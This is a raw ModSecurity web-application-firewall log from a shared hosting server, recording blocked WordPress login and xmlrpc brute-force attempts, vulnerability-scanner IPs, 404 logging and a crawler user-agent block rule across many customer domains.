[Tue May 26 17:25:45.782949 2026] [security2:error] [pid 882219:tid 882384] [client 203.194.101.7:57243] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKQZ8tTkZcqimiXcQDVwAAAKg"]
[Tue May 26 17:25:46.209769 2026] [security2:error] [pid 882219:tid 882411] [client 165.140.119.146:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.bloggertarget.com"] [uri "/index.php"] [unique_id "ahWKQp8tTkZcqimiXcQDYAAAAMM"], referer: https://www.bloggertarget.com
[Tue May 26 17:25:47.137768 2026] [security2:error] [pid 882219:tid 882376] [client 160.250.132.165:51363] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "wphotonics.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKQ58tTkZcqimiXcQDiAAAAKA"]
[Tue May 26 17:25:47.810460 2026] [security2:error] [pid 882219:tid 882406] [client 57.141.2.53:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKQ58tTkZcqimiXcQDlQAAAL4"]
[Tue May 26 17:25:48.461409 2026] [security2:error] [pid 882219:tid 882412] [client 223.235.98.214:33231] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKRJ8tTkZcqimiXcQDqwAAAMQ"]
[Tue May 26 17:25:48.461527 2026] [security2:error] [pid 882219:tid 882412] [client 223.235.98.214:33231] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKRJ8tTkZcqimiXcQDqwAAAMQ"]
[Tue May 26 17:25:49.336843 2026] [security2:error] [pid 882219:tid 882435] [client 160.250.132.165:52550] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "glorodbalsa.com"] [uri "/wp-login.php"] [unique_id "ahWKRZ8tTkZcqimiXcQDugAAANs"]
[Tue May 26 17:25:50.066525 2026] [security2:error] [pid 882219:tid 882414] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKRZ8tTkZcqimiXcQDzwAAAMY"]
[Tue May 26 17:25:51.359496 2026] [security2:error] [pid 882219:tid 882464] [client 160.250.132.165:53773] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "subbroker.bloggertarget.com"] [uri "/wp-login.php"] [unique_id "ahWKR58tTkZcqimiXcQEBQAAAPg"]
[Tue May 26 17:25:53.296690 2026] [security2:error] [pid 882219:tid 882462] [client 57.141.2.64:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKSJ8tTkZcqimiXcQEJAAAAPY"]
[Tue May 26 17:25:53.411963 2026] [security2:error] [pid 882219:tid 882358] [client 160.250.132.165:54948] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpanel.kexcouriers.com"] [uri "/wp-login.php"] [unique_id "ahWKSZ8tTkZcqimiXcQENgAAAI4"]
[Tue May 26 17:25:53.619437 2026] [security2:error] [pid 882219:tid 882365] [client 66.249.70.142:51886] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWKSZ8tTkZcqimiXcQEKwAAAJU"]
[Tue May 26 17:25:54.415945 2026] [security2:error] [pid 882219:tid 882228] [remote 216.73.217.110:60423] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 110.217.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rainadelproperties.com"] [uri "/webhook.php"] [unique_id "ahWKSp8tTkZcqimiXcQEUgAAnAg"]
[Tue May 26 17:25:54.713849 2026] [security2:error] [pid 882219:tid 882432] [client 57.141.2.62:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKSp8tTkZcqimiXcQEUQAAANg"]
[Tue May 26 17:25:55.268429 2026] [security2:error] [pid 882219:tid 882353] [client 160.250.132.165:55983] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.virgence.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKS58tTkZcqimiXcQEaQAAAIk"]
[Tue May 26 17:25:56.058145 2026] [security2:error] [pid 882219:tid 882464] [client 114.119.146.197:39403] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "xllent.in"] [uri "/robots.txt"] [unique_id "ahWKTJ8tTkZcqimiXcQEeQAAAPg"]
[Tue May 26 17:25:56.210030 2026] [security2:error] [pid 882219:tid 882443] [client 203.194.101.7:57576] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKTJ8tTkZcqimiXcQEegAAAOM"]
[Tue May 26 17:25:56.210186 2026] [security2:error] [pid 882219:tid 882443] [client 203.194.101.7:57576] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKTJ8tTkZcqimiXcQEegAAAOM"]
[Tue May 26 17:25:57.013353 2026] [security2:error] [pid 882219:tid 882474] [client 160.250.132.165:56962] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "evitafrica.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKTZ8tTkZcqimiXcQElgAAAQI"]
[Tue May 26 17:25:57.667985 2026] [security2:error] [pid 882219:tid 882374] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKTZ8tTkZcqimiXcQEnwAAAJ4"]
[Tue May 26 17:25:57.773316 2026] [security2:error] [pid 882219:tid 882408] [client 165.140.119.146:56347] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 146.119.140.165.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWKTZ8tTkZcqimiXcQEqQAAAMA"], referer: https://www.bloggertarget.com
[Tue May 26 17:25:57.773441 2026] [security2:error] [pid 882219:tid 882408] [client 165.140.119.146:56347] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "147"] [id "900404"] [msg "wp-comments-post POST logging"] [data "409"] [hostname "www.bloggertarget.com"] [uri "/wp-comments-post.php"] [unique_id "ahWKTZ8tTkZcqimiXcQEqQAAAMA"], referer: https://www.bloggertarget.com
[Tue May 26 17:25:58.809703 2026] [security2:error] [pid 882219:tid 882460] [client 160.250.132.165:57943] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "onlineadda.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKTp8tTkZcqimiXcQEzgAAAPQ"]
[Tue May 26 17:25:59.259075 2026] [security2:error] [pid 882219:tid 882375] [client 223.235.98.214:26605] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKT58tTkZcqimiXcQE1AAAAJ8"]
[Tue May 26 17:25:59.259234 2026] [security2:error] [pid 882219:tid 882375] [client 223.235.98.214:26605] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKT58tTkZcqimiXcQE1AAAAJ8"]
[Tue May 26 17:25:59.592384 2026] [security2:error] [pid 882219:tid 882353] [client 57.141.2.42:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKT58tTkZcqimiXcQE1wAAAIk"]
[Tue May 26 17:25:59.705288 2026] [security2:error] [pid 882219:tid 882462] [client 74.7.175.175:37950] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "404"] [hostname "pstta.in"] [uri "/cgi-sys/404.html"] [unique_id "ahWKT58tTkZcqimiXcQE4gAA9ng"]
[Tue May 26 17:26:00.593815 2026] [security2:error] [pid 882219:tid 882412] [client 160.250.132.165:58937] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.techawarness.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKUJ8tTkZcqimiXcQFAQAAAMQ"]
[Tue May 26 17:26:02.377645 2026] [security2:error] [pid 882219:tid 882465] [client 57.141.2.14:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKUZ8tTkZcqimiXcQFKgAAAPk"]
[Tue May 26 17:26:02.414361 2026] [security2:error] [pid 882219:tid 882379] [client 160.250.132.165:59966] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.isooutsourcing.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKUp8tTkZcqimiXcQFNAAAAKM"]
[Tue May 26 17:26:04.193143 2026] [security2:error] [pid 882219:tid 882400] [client 160.250.132.165:60932] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "pivoteelements.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKVJ8tTkZcqimiXcQFWAAAALg"]
[Tue May 26 17:26:04.678507 2026] [security2:error] [pid 882219:tid 882374] [client 57.141.2.28:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKVJ8tTkZcqimiXcQFWwAAAJ4"]
[Tue May 26 17:26:05.972923 2026] [security2:error] [pid 882219:tid 882461] [client 160.250.132.165:61956] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "root.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKVZ8tTkZcqimiXcQFhwAAAPU"]
[Tue May 26 17:26:06.098846 2026] [security2:error] [pid 882219:tid 882352] [client 91.238.181.19:51480] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKVp8tTkZcqimiXcQFiwAAAIg"]
[Tue May 26 17:26:06.277231 2026] [security2:error] [pid 882219:tid 882418] [client 203.194.101.7:57900] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKVp8tTkZcqimiXcQFlQAAAMo"]
[Tue May 26 17:26:06.277433 2026] [security2:error] [pid 882219:tid 882418] [client 203.194.101.7:57900] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKVp8tTkZcqimiXcQFlQAAAMo"]
[Tue May 26 17:26:06.387397 2026] [security2:error] [pid 882219:tid 882414] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKVZ8tTkZcqimiXcQFigAAAMY"]
[Tue May 26 17:26:08.108214 2026] [security2:error] [pid 882219:tid 882388] [client 160.250.132.165:63102] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "webmail.anujtradingco.com"] [uri "/wp-login.php"] [unique_id "ahWKWJ8tTkZcqimiXcQFugAAAKw"]
[Tue May 26 17:26:08.323414 2026] [security2:error] [pid 882219:tid 882420] [client 91.238.181.19:51498] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKWJ8tTkZcqimiXcQFxAAAAMw"]
[Tue May 26 17:26:09.354702 2026] [security2:error] [pid 882219:tid 882438] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKWJ8tTkZcqimiXcQF2gAAAN4"]
[Tue May 26 17:26:09.795047 2026] [security2:error] [pid 882219:tid 882355] [client 223.235.98.214:32736] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKWZ8tTkZcqimiXcQF8wAAAIs"]
[Tue May 26 17:26:09.795755 2026] [security2:error] [pid 882219:tid 882355] [client 223.235.98.214:32736] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKWZ8tTkZcqimiXcQF8wAAAIs"]
[Tue May 26 17:26:10.197685 2026] [security2:error] [pid 882219:tid 882382] [client 160.250.132.165:64238] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcontacts.srsglobalsoft.com"] [uri "/wp-login.php"] [unique_id "ahWKWp8tTkZcqimiXcQF-wAAAKY"]
[Tue May 26 17:26:10.432577 2026] [security2:error] [pid 882219:tid 882437] [client 91.238.181.19:55906] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKWp8tTkZcqimiXcQF_QAAAN0"]
[Tue May 26 17:26:11.763645 2026] [security2:error] [pid 882219:tid 882441] [client 57.141.2.63:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKW58tTkZcqimiXcQGHAAAAOE"]
[Tue May 26 17:26:12.200472 2026] [security2:error] [pid 882219:tid 882410] [client 160.250.132.165:65331] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "cpcalendars.taotechservices.com"] [uri "/wp-login.php"] [unique_id "ahWKXJ8tTkZcqimiXcQGMgAAAMI"]
[Tue May 26 17:26:12.338460 2026] [security2:error] [pid 882219:tid 882349] [client 91.238.181.19:55928] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKXJ8tTkZcqimiXcQGMwAAAIU"]
[Tue May 26 17:26:14.008847 2026] [security2:error] [pid 882219:tid 882367] [client 160.250.132.165:49946] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.elephoneindia.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKXp8tTkZcqimiXcQGTwAAAJc"]
[Tue May 26 17:26:14.564882 2026] [security2:error] [pid 882219:tid 882438] [client 91.238.181.19:55936] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKXp8tTkZcqimiXcQGWQAAAN4"]
[Tue May 26 17:26:14.838767 2026] [security2:error] [pid 882219:tid 882374] [client 57.141.2.17:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKXp8tTkZcqimiXcQGWAAAAJ4"]
[Tue May 26 17:26:15.741602 2026] [security2:error] [pid 882219:tid 882404] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKX58tTkZcqimiXcQGbwAAALw"]
[Tue May 26 17:26:15.786956 2026] [security2:error] [pid 882219:tid 882384] [client 160.250.132.165:50955] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "ktmadvance-senegal.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKX58tTkZcqimiXcQGfAAAAKg"]
[Tue May 26 17:26:16.556251 2026] [security2:error] [pid 882219:tid 882380] [client 91.238.181.19:55952] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKYJ8tTkZcqimiXcQGjAAAAKQ"]
[Tue May 26 17:26:16.674873 2026] [security2:error] [pid 882219:tid 882422] [client 203.194.101.7:58227] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 7.101.194.203.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKYJ8tTkZcqimiXcQGjQAAAM4"]
[Tue May 26 17:26:16.675019 2026] [security2:error] [pid 882219:tid 882422] [client 203.194.101.7:58227] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahWKYJ8tTkZcqimiXcQGjQAAAM4"]
[Tue May 26 17:26:16.924974 2026] [security2:error] [pid 882219:tid 882466] [client 85.208.96.197:28964] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWKYJ8tTkZcqimiXcQGlAAAAPo"]
[Tue May 26 17:26:16.925212 2026] [security2:error] [pid 882219:tid 882466] [client 85.208.96.197:28964] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/"] [unique_id "ahWKYJ8tTkZcqimiXcQGlAAAAPo"]
[Tue May 26 17:26:17.619215 2026] [security2:error] [pid 882219:tid 882417] [client 160.250.132.165:51928] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "mail.deccandigest.com.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKYZ8tTkZcqimiXcQGqgAAAMk"]
[Tue May 26 17:26:17.760534 2026] [security2:error] [pid 882219:tid 882453] [client 14.233.159.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKYZ8tTkZcqimiXcQGpAAAAO0"]
[Tue May 26 17:26:18.263745 2026] [security2:error] [pid 882219:tid 882430] [client 57.141.2.9:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWKYZ8tTkZcqimiXcQGsQAAANY"]
[Tue May 26 17:26:18.456465 2026] [security2:error] [pid 882219:tid 882461] [client 91.238.181.19:55966] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.paqys.com"] [uri "/index.php"] [unique_id "ahWKYp8tTkZcqimiXcQGvgAAAPU"]
[Tue May 26 17:26:19.543643 2026] [security2:error] [pid 882219:tid 882458] [client 160.250.132.165:52938] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 165.132.250.160.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "tripmanagers.in.md-74.webhostbox.net"] [uri "/wp-login.php"] [unique_id "ahWKY58tTkZcqimiXcQG2gAAAPI"]
[Tue May 26 17:26:20.502036 2026] [security2:error] [pid 882219:tid 882374] [client 223.235.98.214:31013] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 214.98.235.223.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "thriveswift.com"] [uri "/xmlrpc.php"] [unique_id "ahWKZJ8tTkZcqimiXcQG-QAAAJ4"]
